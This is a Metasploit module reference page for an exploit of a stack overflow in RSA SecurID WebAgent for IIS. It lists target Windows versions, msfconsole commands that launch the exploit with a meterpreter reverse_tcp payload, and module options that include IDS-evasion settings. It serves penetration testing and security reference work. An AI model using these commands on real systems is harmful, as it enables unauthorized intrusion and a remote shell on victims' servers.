Browse Exploit & Auxiliary Modules

The Metasploit Project hosts the world's largest database of quality assured exploits, including hundreds of remote exploits, auxiliary modules, and payloads. You can even review the Metasploit Framework source code of any module - or write your own.

Search for modules

Open Source Vulnerability DataBase ID
Bugtraq ID
Full Text Search
Common Vulnerabilities Exposures ID
Microsoft Security Bulletin ID
 
Search Modules

Microsoft IIS ISAPI RSA WebAgent Redirect Overflow

This module exploits a stack buffer overflow in the SecurID Web Agent for IIS. This ISAPI filter runs in-process with inetinfo.exe, any attempt to exploit this flaw will result in the termination and potential restart of the IIS service.


Rank

  • Good

Authors

  • hdm < hdm [at] metasploit.com >

References


Exploit Targets

  • 0 - RSA WebAgent 5.2 (default)
  • 1 - RSA WebAgent 5.3
  • 2 - RSA WebAgent 5.2 on Windows 2000 English
  • 3 - RSA WebAgent 5.3 on Windows 2000 English
  • 4 - RSA WebAgent 5.2 on Windows XP SP0-SP1 English
  • 5 - RSA WebAgent 5.3 on Windows XP SP0-SP1 English
  • 6 - RSA WebAgent 5.2 on Windows XP SP2 English
  • 7 - RSA WebAgent 5.3 on Windows XP SP2 English
  • 8 - RSA WebAgent 5.2 on Windows 2003 English SP0
  • 9 - RSA WebAgent 5.3 on Windows 2003 English SP0

Development


Similar Modules


Usage Information

$ msfconsole

                ##                          ###           ##    ##
 ##  ##  #### ###### ####  #####   #####    ##    ####        ######
####### ##  ##  ##  ##         ## ##  ##    ##   ##  ##   ###   ##
####### ######  ##  #####   ####  ##  ##    ##   ##  ##   ##    ##
## # ##     ##  ##  ##  ## ##      #####    ##   ##  ##   ##    ##
##   ##  #### ###   #####   #####     ##   ####   ####   #### ###
                                      ##

msf > use exploit/windows/isapi/rsa_webagent_redirect
msf exploit(rsa_webagent_redirect) > show payloads
msf exploit(rsa_webagent_redirect) > set PAYLOAD windows/meterpreter/reverse_tcp
msf exploit(rsa_webagent_redirect) > set LHOST [MY IP ADDRESS]
msf exploit(rsa_webagent_redirect) > set RHOST [TARGET IP]
msf exploit(rsa_webagent_redirect) > exploit


Module Options

Proxies Use a proxy chain
RHOST The target address
RPORT The target port (default: 80)
URL The path to IISWebAgentIF.dll (default: /WebID/IISWebAgentIF.dll)
VHOST HTTP server virtual host
BasicAuthPass The HTTP password to specify for basic authentication
BasicAuthUser The HTTP username to specify for basic authentication
ContextInformationFile The information file that contains context information
DOMAIN The domain to use for windows authentification
DigestAuthIIS Conform to IIS, should work for most servers. Only set to false for non-IIS servers
DigestAuthPassword The HTTP password to specify for digest authentication
DigestAuthUser The HTTP username to specify for digest authentication
DisablePayloadHandler Disable the handler code for the selected payload
DynamicSehRecord Generate a dynamic SEH record (more stealthy)
EnableContextEncoding Use transient context when encoding payloads
FingerprintCheck Conduct a pre-exploit fingerprint verification
NTLM::SendLM Always send the LANMAN response (except when NTLMv2_session is specified)
NTLM::SendNTLM Activate the 'Negotiate NTLM key' flag, indicating the use of NTLM responses
NTLM::SendSPN Send an avp of type SPN in the ntlmv2 client Blob, this allow authentification on windows Seven/2008r2 when SPN is required
NTLM::UseLMKey Activate the 'Negotiate Lan Manager Key' flag, using the LM key when the LM response is sent
NTLM::UseNTLM2_session Activate the 'Negotiate NTLM2 key' flag, forcing the use of a NTLMv2_session
NTLM::UseNTLMv2 Use NTLMv2 instead of NTLM2_session when 'Negotiate NTLM2' key is true
SSL Negotiate SSL for outgoing connections
SSLVersion Specify the version of SSL that should be used (accepted: SSL2, SSL3, TLS1)
UserAgent The User-Agent header to use for all requests
VERBOSE Enable detailed status messages
WORKSPACE Specify the workspace for this module
WfsDelay Additional delay when waiting for a session
HTTP::header_folding Enable folding of HTTP headers
HTTP::method_random_case Use random casing for the HTTP method
HTTP::method_random_invalid Use a random invalid, HTTP method for request
HTTP::method_random_valid Use a random, but valid, HTTP method for request
HTTP::pad_fake_headers Insert random, fake headers into the HTTP request
HTTP::pad_fake_headers_count How many fake headers to insert into the HTTP request
HTTP::pad_get_params Insert random, fake query string variables into the request
HTTP::pad_get_params_count How many fake query string variables to insert into the request
HTTP::pad_method_uri_count How many whitespace characters to use between the method and uri
HTTP::pad_method_uri_type What type of whitespace to use between the method and uri (accepted: space, tab, apache)
HTTP::pad_post_params Insert random, fake post variables into the request
HTTP::pad_post_params_count How many fake post variables to insert into the request
HTTP::pad_uri_version_count How many whitespace characters to use between the uri and version
HTTP::pad_uri_version_type What type of whitespace to use between the uri and version (accepted: space, tab, apache)
HTTP::uri_dir_fake_relative Insert fake relative directories into the uri
HTTP::uri_dir_self_reference Insert self-referential directories into the uri
HTTP::uri_encode_mode Enable URI encoding (accepted: none, hex-normal, hex-all, hex-random, u-normal, u-all, u-random)
HTTP::uri_fake_end Add a fake end of URI (eg: /%20HTTP/1.0/../../)
HTTP::uri_fake_params_start Add a fake start of params to the URI (eg: /%3fa=b/../)
HTTP::uri_full_url Use the full URL for all HTTP requests
HTTP::uri_use_backslashes Use back slashes instead of forward slashes in the uri